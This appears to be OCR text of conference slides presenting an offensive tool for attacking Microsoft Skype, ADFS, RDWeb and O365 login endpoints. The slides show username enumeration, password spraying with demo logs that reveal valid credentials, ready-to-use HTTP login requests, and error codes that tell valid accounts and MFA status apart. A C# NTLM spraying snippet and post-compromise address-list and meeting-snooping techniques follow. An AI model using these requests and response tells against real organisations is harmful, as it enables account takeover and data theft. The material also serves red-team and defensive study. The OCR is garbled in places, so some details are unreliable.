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Intro Demonstration 


Microsoft Attack Surface 


Domain Enumeration 


IP Address Domain Name User Enumeration URL Password Spray URL Federated 0365 


0365 MFA Service Sip Enabled Account Disabled Password Expired Server Error Authenticating Access Token 


[18:50] Carnivore started at: 31/07/2020 18:50:41 


[18:50] Output will be automatically logged to: C:\temp 


Research — General Statistics 


Research — General Statistics 


Subdomain Enumeration 


Research — Subdomain Enumeration 


m User Enum 


Research — Subdomain Enumeration 
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Username Enumeration 


Username Enumeration Demonstration 


Microsoft Attack Surface 


Credentials 


Username Password 0365 MFA Service Sip Enabled Account Disabled Password Expired Server Error Authenticating Access Token 


[19:07] Looking up subdomain DNS records... 


[19:07] Validating subdomain records... 


[19:07] No user enum or pass spray URL discovered - attempting to find NTLM endpoints... 
[19:07] [*] Skype Server Hostname: nevtek-skype01.nevtek.nev 

[19:07] [*] nevtek-skype01.nevtek.nev: 10.129.121.143 

[19:07] Enumerating Internal Domain Information... 

[19:07] OAuth Domain name: NEVTEK.NEV 

[19:07] OAuth Domain name: NEVTEK.NEV 

[19:07] OAuth Domain name: NEVTEK.NEV 

[19:07] OAuth Domain name: NEVTEK.NEV 


[19:07] Finished subdomain enumeration and validation... 


Username Enumeration 


* Smart Enumeration 
* 9 lists of statistically likely usernames 
* Automatically selects likely format 


e Legacy vs Modern Format 
* NEVTEK\jsmith 
* jsmith@nevtek.nev 


ADFS: MSIS Cookie 


POST /adfs/Is/idpinitiatedsignon HTTP/1.1 
Host: federated.nevtek.nev 


User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) 
Gecko/20100101 Firefox/71.0 


Content-Type: application/x-www-form-urlencoded 
Content-Length: 85 


SigninidpSite=SigninidpSite&SigninSubmit=Sign+in&SingleSignOut=sSi 
ngleSignOut 


ADFS: POST Request 


POST /adfs/Is/idpinitiatedsignon HTTP/1.1 
Host: federated.nevtek.nev 


User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) 
Gecko/20100101 Firefox/71.0 


Cookie: 
Eer amd FZZVXXXXOISRW83WVIrMHhSNEtaYkJSYKIIUWxJc29m 


Content-Type: application/x-www-form-urlencoded 
Content-Length: 86 


UserName=nevtek\jsmith&Password=Password1&AuthMethod=FormsAut 
hentication 


ADFS: Invalid Response 


HTTP/1.1 200 OK 

Cache-Control: no-cache,no-store 

Pragma: no-cache 

Content-Length: 15126 

Content-Type: text/html; charset=utf-8 

Expires: -1 

Server: Microsoft-HTTPAPI/2.0 

x-frame-options: DENY 

P3P: CP="ADFS doesn't have P3P policy, please contact your site's admin for more details." 


Set-Cookie: 
MSISSamlRequest=QmFzZVVybD1odHRwcXXXW83WVIrMHh5NEtaYkJ5YkliUWxJc29mR3MIM2Qs; 
path=/adfs; HttpOnly; Secure 


Date: Tue, 17 Dec 2019 20:16:57 GMT 


ADFS: Valid Response 


HTTP/1.1 302 Found 

Content-Length: O 

Content-Type: text/html; charset=utf-8 

Location: https://federated.nevtek.nev:443/adfs/Is/idpinitiatedsignon 

Server: Microsoft-HTTPAPI/2.0 

P3P: CP="ADFS doesn't have P3P policy, please contact your site's admin for more details." 


Set-Cookie: MSISSamlRequest=QmFzZVVybD1o0dHXXXXiUWxJc29mR3MIM20=; path=/adfs; 
HttpOnly; Secure 


Set-Cookie: 
MSISAuth=AAEAAAjGUXaZwZj5rCLwZnX/MVCa0X+XXXXXX+EMO7ic2AVAjmFgoYXxLFuU 
zh/Y8DBR5v0gHY+x; path=/adfs; HttpOnly; Secure 


Date: Tue, 17 Dec 2019 20:16:34 GMT 


RDWeb: POST Request 


POST /RDWeb/Pages/en-US/login.aspx HTTP/1.1 

Host: remote.nevtek.nev 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp, */*;q=0.8 
Accept-Language: en-GB,en;q=0.5 

Accept-Encoding: gzip, deflate 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 48 


DomainUserName=nevtek\cscott&UserPass=Password1 


RDWeb: Invalid Response 


HTTP/1.1 200 OK 

Cache-Control: no-cache 

Pragma: no-cache 

Content-Type: text/xml; charset=utf-8 
Expires: -1 

Server: Microsoft-lIS/8.5 


Set-Cookie: TSWAAuthClientSideCookie=Name=nevtek%5Cjsmith& MachineType=public&WorkSpacelD=; expires=Tue, 12-Sep-2017 
17:16:34 GMT; path=/; secure 


Set-Cookie: TSWAAuthHttpOnlyCookie=; expires=Mon, 11-Oct-1999 23:00:00 GMT; path=/; secure; HttpOnly; SameSite=Lax 
X-AspNet-Version: 4.0.30319 

X-Powered-By: ASP.NET 

Date: Mon, 08 Jun 2020 17:16:34 GMT 

Connection: close 

Content-Length: 13124 


RDWeb: Valid Response 


HTTP/1.1 302 Found 

Cache-Control: private 

Content-Type: text/html; charset=utf-8 
Location: /RDWeb/Pages/en-US/default.aspx 
Server: Microsoft-lIS/8.5 


un TSWAAuthClientSideCookie=Name=nevtek%5Ccscott&MachineType=public&WorkSpacelD=; 
path=/; secure 


Set-Cookie: TSWAAuthHttpOnlyCookie=A6C95DE1EB8443D6CXXXX6E51C36ABF9; path=/; secure; HttpOnly 
X-AspNet-Version: 4.0.30319 

X-Powered-By: ASP.NET 

Date: Mon, 08 Jun 2020 17:16:57 GMT 

Connection: close 

Content-Length: 148 


Password Spraying 


Password Spraying 


e Discovered Format 
e Pre-built lists 


Password Spraying Demonstration 


Microsoft Attack Surface 


ubername list.txt 


Credentials 


Username Password 0365 MFA Service Sip Enabled Account Disabled Password Expired Server Error Authenticating Access Token 


Output 
[19:24] Looking up subdomain DNS records... 
[19:24] Validating subdomain records... 
[19:24] No user enum or pass spray URL discovered - attempting to find NTLM endpoints... 
[19:24] [*] Skype Server Hostname: nevtek-skype01.nevtek.nev 
[19:24] [*] nevtek-skype01.nevtek.nev: 10.129.121.143 
[19:25] Enumerating Internal Domain Information... 
[19:25] OAuth Domain name: NEVTEK.NEV 
[19:25] OAuth Domain name: NEVTEK.NEV 


[19:25] OAuth Domain name: NEVTEK.NEV 


[19:25] OAuth Domain name: NEVTEK.NEV 


[19:25] Finished subdomain enumeration and validation... 


Password Spraying 


Username Password 0365 MFA Service Sip Enabled Account Disabled Password Expired Server Error Authenticating Access Token 
| NEVTEK\jsmith [Summer2019 Skype cwt=AAEBHAEFAAAAAAAFFC 


Y 
NEVTEK\msmith |, | Skype AO 
NEVTEK\skumar | | Skype KN | |__| | 
NEVTEK\johnson| 00000 | skye FS o G G 


Research — Password Spraying 


Exchange: 

/Autodiscover 

/ews 
/autodiscover/autodiscover.xml 
/rpc 

/oab 


/mapi 


Skype: ADFS: RDWeb: 
/RDWeb/Pages/en- 
/WebTicket/oauthtoken /adfs/Is/idpinitiatedsignon 2196 |US/login.aspx 184 
/WebTicket/WebTicketService.svc /adfs/services/trust/2005/windowstransport 86 /Rpc 180 


/abs/ /RDWeb/FeedLogin 3 


/CertProv 


/RgsClients 


/WebTicket/ 


/Autodiscover 


Password Spraying — C# NTLM Auth Spraying 


HttpWebRequest request = (Http WebRequest)WebRequest.Create(url); 
request.Credentials = new NetworkCredential(username, password); 
request.Method = "GET"; 
try 
{ 
HttpWebResponse response = (Http WebResponse)request.GetResponse(); 
Stream receiveStream = response.GetResponseStream(); 
StreamReader readStream = new StreamReader(receiveStream, Encoding.UTF8); 
string responseString = readStream.ReadToEnd(); 
Console.WriteLine("RESPONSE: " + responseString); 

} 


catch (WebException webex) 


{ 
HttpWebResponse response2 = webex.Response as HttpWebResponse; 


} 


A Note on Different Services 


e ADFS Portal 
e Single sign on to third party services 
e Can lead to compromise of systems they might not be aware of 
e If 0365 AND Federated = WIN! 


* RDWeb - Remote desktop through the web 


Post Compromise — Address List - 
Demonstration 


Microsoft Attack Surface 


Sip Username Email Address i Department Office Presence Phone Number Note 


Credentials 


Username Password 0365 MFA Service Sip Enabled Account Disabled Password Expired Server Error Authenticating Access Token 
Jjohnson ONEVTEK.NEV 


E Re LE A A i S ec Wd7 N 9 O QAoxzXYCAO au7hAm1Cm1 
EK.NEV Summ Skype CW JC: o Nd7 O QÃoxz au7hAm1Cm1 


[19:25] OAuth Domain name: NEVTEK.NEV 

[19:25] OAuth Domain name: NEVTEK.NEV 

[19:25] Finished subdomain enumeration and validation... 

[19:26] Password Spraying will add Domain information to given usernames in the following order: 

[19:26] Domain given with username > Manually entered domain information > Domain information gathered for specified service > Domain information gathered for any surface > Fail 

[19:26] "Legacy format" usernames may contain numbers, or be linked to payroll ID (jsmith945 or PT32423432423423234) and therefore not be discoverable by Smart Enumeration, however, the modern format is more likely to match email style (jsmith@domain.com or john.smith@domain.com)... 
[19:26] Adding new service interface with service: Skype 

[19:26] Usernames to spray: 48705 

[19:26] [$] Account Disabled: jjohnson@NEVTEK.NEV 

[19:27] [!] Valid Credentials: cscott@NEVTEK.NEV:Summer2020 


[19:37] [*] Password spraying stopped at... 


Post Compromise — Address List 


Presence Phone Number Note 
Offline, Unknown | +447789155655 || keep thinking about: 5 


Name Sip Username Email Address Title Department Office 
Clark Scott cscott@nevtek.nev clark.scott@nevtek.nev Compliance and Training Officer | HR Leeds 
Daisy Johnson|djohnson@nevteknev[daisyjonnson@neteknew[HeadofHR [AR [leeds [None Unknown [1447789568556] 
James Brown 


Jack Miller 


Post Compromise — Address List 


* PeopleSearch 
e A-Z 
e No “next” 
* Absolute insanity 
* Digraphs/Trigraphs 
e Common 
e All 


Post Compromise — WebApp Proxy 


e Jumping a misconfigured WebApp proxy 


Post Compromise — Meeting Snooper 


Microsoft Attack Surface 


Username Conference ID Subject Attendees Meeting Ends Join URL Lobby Bypass 


Credentials 


Username 0365 MFA Service Sip Enabled Account Disabled Password Expired Server Error Authenticating 


[17:33] Internal : JI 


[17:33] Manchester : +44 NS 
[17:33] London : +44 E 
[17:33] Australia : + 
[17:33] Denmark : SS 


Global Verbosity Level: 2 - Normal 


Microsoft Attack Surface 


Username Conference ID Subject Attendees Meeting Ends Join URL Lobby Bypass 


SESS | MN Test Recurring Meetings 26 December 2020 00:00:00 pra d Enabled 
"sip:R * 


Post Compromise - MeetingSnooperTM 


e Self-scheduled meetings 
* Meeting END time only 


0305 


0365 - General 


e Federated 
e Cannot spray office portal 
e ADFS server location in response 


* Not Federated 
e Spray office portal 
e Valid+MFA 
e Password Spray Countermeasures 


e 0365 — Robust! 
* Trusted vs Untrusted bad password count 


Federated: Request 


GET /common/userrealm/?user=username@contoso.com&api- 
version=2.1&checkForMicrosoftAccount=true HTTP/1.1 


Host: login.microsoftonline.com 


User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) 
Gecko/20100101 Firefox/78.0 


Accept: 
text/html,application/xhtml+xmlapplication/xml;q=0.9,image/webp,*/*;q=0 


Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Upgrade-Insecure-Requests: 1 


Federated: Response 


"MicrosoftAccount":1, 
“IsMicrosoftAccountSet":true, 
"NameSpaceType":"Managed”, 


"Login":"username(©contoso.com", 
"DomainName":"contoso.com", 
"FederationBrandName":"Contoso, Ltd”, 
“TenantBrandinginfo":null, 


“cloud instance name":"microsoftonline.com" 


Password Spraying: Request 


POST /organizations/oauth2/v2.0/token HTTP/1.1 
Host: login.microsoftonline.com 


User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12 1 3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like 
Gecko) Version/12.0 Mobile/15E148 Safari/604.1 


Accept: text/html application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-GB,en;q=0.5 

Accept-Encoding: gzip, deflate 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 109 


Sd e me=user.name@contoso.com&password=Password1&client_id=randomid&sco 
pe=whatevs 


Password Spraying: Invalid Password 
Response 


"error" invalid grant” 

"error description":"AADSTS50126: Invalid username or 
password.\r\nTrace ID: XXXX\r\nCorrelation ID: XXX\r\nTimestamp: 
2019-10-10 16:007" 


Password Spraying: Invalid Username 
Response 


"error" invalid grant” 


"error description":"AADSTS50034: The user account {EmailHidden} 
does not exist in the contoso.com directory. To sign into this 
application, the account must be added to the directory.\r\nTrace ID: 
XXX\r\nCorrelation ID: XXX\r\nTimestamp: 2019-10-10 14:24:007", 


Password Spraying: Valid User + Password — 
No MFA 


"error": unauthorized client” 
"error description":"AADSTS700016: Application with identifier 
'randomid' was not found in the directory “contoso.com'. This can 
happen if the application has not been installed by the administrator of 
the tenant or consented to by any user in the tenant. You may have 
sent your authentication request to the wrong tenant.\r\nTrace ID: 


XXX\r\nCorrelation ID: XX\r\nTimestamp: 2020-06-11 14:57:00Z", 


Password Spraying: Valid User + Password - 
MFA 


"error":"invalid grant” 


"error description":"AADSTS50076: Due to a configuration change 
made by your administrator, or because you moved to a new location, 
you must use multi-factor authentication to access 
'00000XXXXX0000000' AnnTrace ID: XXXX\r\nCorrelation ID: 
XXXX\r\nTimestamp: 2020-06-11 14:49:152", 


Outro 


Information 


e httos://github.com/ReverendThing/Carnivore 


